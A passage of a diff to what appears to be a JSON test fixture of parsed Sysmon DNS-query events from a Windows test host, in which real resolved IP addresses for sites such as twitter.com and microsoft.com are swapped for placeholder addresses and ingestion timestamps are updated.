ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.329\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.facebook.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 star-mini.c10r.facebook.com;::ffff:31.13.71.36;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272022200Z'/\u003e\u003cEventRecordID\u003e212\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.329\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.facebook.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 star-mini.c10r.facebook.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:17.272Z", 
@@ -20281,12 +20012,12 @@
 "type": "CNAME"
 },
 {
- "data": "192.229.163.25",
+ "data": "192.168.163.25",
 "type": "A"
 }
 ],
 "resolved_ip": [
- "192.229.163.25"
+ "192.168.163.25"
 ]
 },
 "network": {
@@ -20306,13 +20037,13 @@ "platform.twitter.com" ], "ip": [ - "192.229.163.25" + "192.168.163.25" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742618800Z", + "ingested": "2021-12-09T13:50:23.457664600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272102900Z'/\u003e\u003cEventRecordID\u003e213\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.386\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eplatform.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.229.163.25;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent 
xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272102900Z'/\u003e\u003cEventRecordID\u003e213\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.386\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eplatform.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs472.wac.edgecastcdn.net;type: 5 cs1-apr-8315.wac.edgecastcdn.net;type: 5 wac.apr-8315.edgecastdns.net;type: 5 cs1-lb-us.8315.ecdns.net;type: 5 cs491.wac.edgecastcdn.net;::ffff:192.168.163.25;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:17.272Z", 
@@ -20372,23 +20103,23 @@
 },
 "answers": [
 {
- "data": "104.244.42.8",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "104.244.42.200",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "104.244.42.136",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "104.244.42.72",
+ "data": "89.160.20.156",
 "type": "A"
 },
 {
- "data": "192.5.6.30",
+ "data": "192.168.6.30",
 "type": "A"
 },
 {
@@ -20396,7 +20127,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.33.14.30",
+ "data": "192.168.14.30",
 "type": "A"
 },
 {
@@ -20404,7 +20135,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.26.92.30",
+ "data": "192.168.92.30",
 "type": "A"
 },
 {
@@ -20412,7 +20143,7 @@
 "type": "AAAA"
 },
 {
- "data": "192.31.80.30",
+ "data": "192.168.80.30",
 "type": "A"
 },
 {
@@ -20421,17 +20152,17 @@
 }
 ],
 "resolved_ip": [
- "104.244.42.8",
- "104.244.42.200",
- "104.244.42.136",
- "104.244.42.72",
- "192.5.6.30",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "89.160.20.156",
+ "192.168.6.30",
 "2001:503:a83e::2:30",
- "192.33.14.30",
+ "192.168.14.30",
 "2001:503:231d::2:30",
- "192.26.92.30",
+ "192.168.92.30",
 "2001:503:83eb::30",
- "192.31.80.30",
+ "192.168.80.30",
 "2001:500:856e::30"
 ]
 },
@@ -20447,24 +20178,21 @@ "syndication.twitter.com" ], "ip": [ - "104.244.42.8", - "104.244.42.200", - "104.244.42.136", - "104.244.42.72", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742627200Z", + "ingested": "2021-12-09T13:50:23.457670400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272134300Z'/\u003e\u003cEventRecordID\u003e214\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esyndication.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:104.244.42.8;::ffff:104.244.42.200;::ffff:104.244.42.136;::ffff:104.244.42.72;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:17.272134300Z'/\u003e\u003cEventRecordID\u003e214\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:16.482\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esyndication.twitter.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:17.272Z", @@ -20528,12 +20256,12 @@ "type": "CNAME" }, { - "data": "172.217.10.34", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "network": { 
@@ -20549,13 +20277,13 @@ "ade.googlesyndication.com" ], "ip": [ - "172.217.10.34" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742635500Z", + "ingested": "2021-12-09T13:50:23.457676Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:21.552490900Z'/\u003e\u003cEventRecordID\u003e215\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:19.578\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eade.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:172.217.10.34;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:21.552490900Z'/\u003e\u003cEventRecordID\u003e215\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:19.578\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eade.googlesyndication.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:21.552Z", @@ -20623,12 +20351,12 @@ "type": "CNAME" }, { - "data": "72.21.81.200", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.81.200" + "89.160.20.156" ] }, "network": { 
@@ -20645,13 +20373,13 @@ "iecvlist.microsoft.com" ], "ip": [ - "72.21.81.200" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742643900Z", + "ingested": "2021-12-09T13:50:23.457681700Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:33.148104300Z'/\u003e\u003cEventRecordID\u003e216\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:31.219\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003eiecvlist.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:72.21.81.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:33.148104300Z'/\u003e\u003cEventRecordID\u003e216\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:31.219\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003eiecvlist.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ie9comview.vo.msecnd.net;type: 5 cs9.wpc.v0cdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:33.148Z", @@ -20715,12 +20443,12 @@ "type": "CNAME" }, { - "data": "40.77.232.95", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "40.77.232.95" + "89.160.20.156" ] }, "network": { 
@@ -20736,13 +20464,13 @@ "tsfe.trafficshaping.dsp.mp.microsoft.com" ], "ip": [ - "40.77.232.95" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742652300Z", + "ingested": "2021-12-09T13:50:23.457687400Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:03.685690200Z'/\u003e\u003cEventRecordID\u003e220\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:02.752\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003etsfe.trafficshaping.dsp.mp.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tsfe.trafficmanager.net;::ffff:40.77.232.95;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:03.685690200Z'/\u003e\u003cEventRecordID\u003e220\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:02.752\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003etsfe.trafficshaping.dsp.mp.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tsfe.trafficmanager.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:39:03.685Z", 
@@ -20814,7 +20542,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.742660800Z", + "ingested": "2021-12-09T13:50:23.457693200Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:22.432153100Z'/\u003e\u003cEventRecordID\u003e221\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:20.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-b1a2-5d2f-0000-00106aca0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e844\u003c/Data\u003e\u003cData Name='QueryName'\u003eisatap.local.crowbird.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9003\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
@@ -20885,7 +20613,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.742669400Z", + "ingested": "2021-12-09T13:50:23.457699Z", "code": "22", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:39:42.554539300Z'/\u003e\u003cEventRecordID\u003e230\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:39:40.504\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e9f7-5d2f-0000-001031039c00}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e676\u003c/Data\u003e\u003cData Name='QueryName'\u003epuppet\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e9003\u003c/Data\u003e\u003cData Name='QueryResults'\u003e\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Puppet Labs\\Puppet\\sys\\ruby\\bin\\ruby.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", 
